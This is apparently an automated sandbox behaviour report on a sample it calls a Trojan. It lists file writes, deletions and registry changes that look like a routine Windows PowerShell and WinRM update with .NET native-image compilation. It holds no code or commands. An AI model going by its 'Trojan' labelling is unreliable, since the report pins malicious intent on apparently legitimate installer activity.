%System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (0 bytes)
%System%\winrmprov.mof (0 bytes)
%WinDir%\imsins.BAK (0 bytes)
%System%\SETB.tmp (0 bytes)
%System%\SET1F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (0 bytes)
%WinDir%\inf\oem10.inf (0 bytes)
%System%\SET28.tmp (0 bytes)
%System%\SET5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (0 bytes)
%System%\winrshost.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (0 bytes)
%System%\SET31.tmp (0 bytes)
%WinDir%\inf\SET18.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (0 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\@.lnk (0 bytes)
%System%\WsmPty.xsl (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (0 bytes)
%System%\SET29.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (0 bytes)
%System%\WsmRes.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (0 bytes)
%WinDir%\Temp\UPD3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (0 bytes)
%System%\SET2C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (0 bytes)
%System%\SET15.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (0 bytes)
%System%\wbem\SET1E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (0 bytes)
%System%\SET2D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (0 bytes)
%System%\SET24.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (0 bytes)
%System%\winrssrv.dll (0 bytes)
%WinDir%\inf\WindowsRemoteShell.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (0 bytes)
%System%\winrm\0409\SET1D.tmp (0 bytes)
%System%\SETD.tmp (0 bytes)
%System%\SET10.tmp (0 bytes)
%WinDir%\inf\SET19.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (0 bytes)
%System%\SET9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC6.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (0 bytes)
%System%\winrm\0409\SET37.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (0 bytes)
%System%\winrs.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET39.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (0 bytes)
%System%\SET2F.tmp (0 bytes)
%WinDir%\Help\SETC5.tmp (0 bytes)
%System%\WsmSvc.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (0 bytes)
%System%\winrsmgr.dll (0 bytes)
%System%\SET30.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1A.tmp (0 bytes)
%System%\SET23.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (0 bytes)
%System%\WsmTxt.xsl (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (0 bytes)
%WinDir%\inf\SET33.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (0 bytes)

The process PSCustomSetupUtil.exe:2596 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\J147ADHK\System.Management.Automation.dll (81046 bytes)

The process PSCustomSetupUtil.exe:2900 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\M47ADGJM\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)

The process PSCustomSetupUtil.exe:3776 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\G037ADGK\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)

The process PSCustomSetupUtil.exe:3736 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\CUX147AD\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)

The process PSCustomSetupUtil.exe:3164 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\N58BEHKN\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)

The process PSCustomSetupUtil.exe:3008 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\S9DGJMPS\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:3660 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\1KNQTWZ2\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)

The process PSCustomSetupUtil.exe:3124 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\Q8BEHKNR\Microsoft.WSMan.Management.resources.dll (13 bytes)

The process PSCustomSetupUtil.exe:2744 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\J258BEHK\Microsoft.PowerShell.Security.dll (2392 bytes)

The process PSCustomSetupUtil.exe:2968 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\FX0369DG\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:3080 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\CUX036AD\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)

The process PSCustomSetupUtil.exe:2620 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\5NQUX036\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)

The process PSCustomSetupUtil.exe:2768 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\1LOSVY15\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)

The process PSCustomSetupUtil.exe:2876 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\HZ258BEI\Microsoft.WSMan.Management.dll (9608 bytes)

The process PSCustomSetupUtil.exe:2720 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\ZHKNQTX0\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)

The process PSCustomSetupUtil.exe:2924 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\8QTWZ258\System.Management.Automation.resources.dll (9320 bytes)

The process PSCustomSetupUtil.exe:3708 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\FZ258CFI\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)

The process PSCustomSetupUtil.exe:3800 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\P9CFILPS\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:3056 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\YGJMQTWZ\Microsoft.PowerShell.Security.resources.dll (9 bytes)

The process PSCustomSetupUtil.exe:2836 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\SADGJNQT\Microsoft.WSMan.Runtime.dll (7 bytes)

The process PSCustomSetupUtil.exe:2680 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\L369CFIL\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)

The process PSCustomSetupUtil.exe:3032 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\WEHKNQTW\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:3684 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\3MPSVZ25\Microsoft.PowerShell.Editor.dll (32824 bytes)

The process PSSetupNativeUtils.exe:4084 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)

The process mscorsvw.exe:2596 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp\Microsoft.PowerShell.Editor.dll (64500 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5d.dat (0 bytes)

The process mscorsvw.exe:3888 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD8.tmp\Microsoft.PowerShell.GraphicalHost.dll (47422 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD8.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5f.dat (0 bytes)

The process mscorsvw.exe:2344 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD4.tmp\Microsoft.PowerShell.Commands.Utility.dll (40638 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5b.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD4.tmp (0 bytes)

The process mscorsvw.exe:2052 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDA.tmp\Microsoft.WSMan.Management.dll (34061 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDA.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index61.dat (0 bytes)

The process mscorsvw.exe:1612 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD1.tmp\Microsoft.BackgroundIntelligentTransfer.Management.dll (27440 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD1.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index58.dat (0 bytes)

The process mscorsvw.exe:2248 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDB.tmp\Microsoft.WSMan.Runtime.dll (17713 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD3.tmp\Microsoft.PowerShell.Commands.Management.dll (45020 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index62.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDB.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD3.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5a.dat (0 bytes)

The process mscorsvw.exe:504 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD9.tmp\Microsoft.PowerShell.Security.dll (35530 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD9.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index60.dat (0 bytes)

The process mscorsvw.exe:2504 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD5.tmp\Microsoft.PowerShell.ConsoleHost.dll (33378 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\index5c.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD5.tmp (0 bytes)

The process mscorsvw.exe:2116 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD2.tmp\Microsoft.PowerShell.Commands.Diagnostics.dll (33116 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD2.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index59.dat (0 bytes)

The process mscorsvw.exe:2428 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDC.tmp\System.Management.Automation.dll (105990 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\index63.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDC.tmp (0 bytes)

The process mscorsvw.exe:3400 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (514 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319\NGEN_SERVICE.LOG (83393 bytes)

The process mscorsvw.exe:3372 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD7.tmp\Microsoft.PowerShell.GPowerShell.dll (50011 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD7.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5e.dat (0 bytes)

Registry activity

The process mofcomp.exe:2556 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F4 A7 19 66 A5 A5 DE 59 3F F4 63 BC 15 D4 35 8D"

The process WindowsXP-KB968930-x86-ENG.exe:176 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F A8 49 98 3A 87 16 F4 F6 47 D5 4E DB 71 EB DB"

The process ngen.exe:3900 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C7 D0 26 61 5B FA 59 4E 77 61 CF 85 44 28 1B B2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
"Scenario" = "32"

The process ngen.exe:3924 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "87 4D E6 B9 A0 DC 0D 9A A3 1D B6 EC E4 BD 5F 5C"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

The process ngen.exe:3916 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 34 59 66 E7 DE 02 6D C4 E4 18 09 B2 88 70 BC"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

The process ngen.exe:3496 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F 17 F0 E8 CD 4F 17 0F FC E4 03 C8 F3 30 D9 27"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

The process ngen.exe:3908 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 D0 85 7D CD 42 AC 26 11 C7 BD 97 A3 85 7D 35"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:3416 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "44 5F 34 B6 4B E4 06 A2 62 28 2C 1E B4 34 2C 3A"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

The process ngen.exe:3536 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A 55 0F 97 B1 67 BA 25 0A B5 CD 00 BE CF FE 2E"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:3452 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B 7D 69 D4 FC 8C 66 05 34 FF 39 F5 99 F8 70 E5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

The process ngen.exe:3552 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 0E BE 08 9D 8C 6A BD 5A 1F B1 0F 1B D8 8C BC"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

The process ngen.exe:3576 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A5 1F BE 0D 67 F1 3A B8 C0 18 C0 87 52 EB EF C8"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

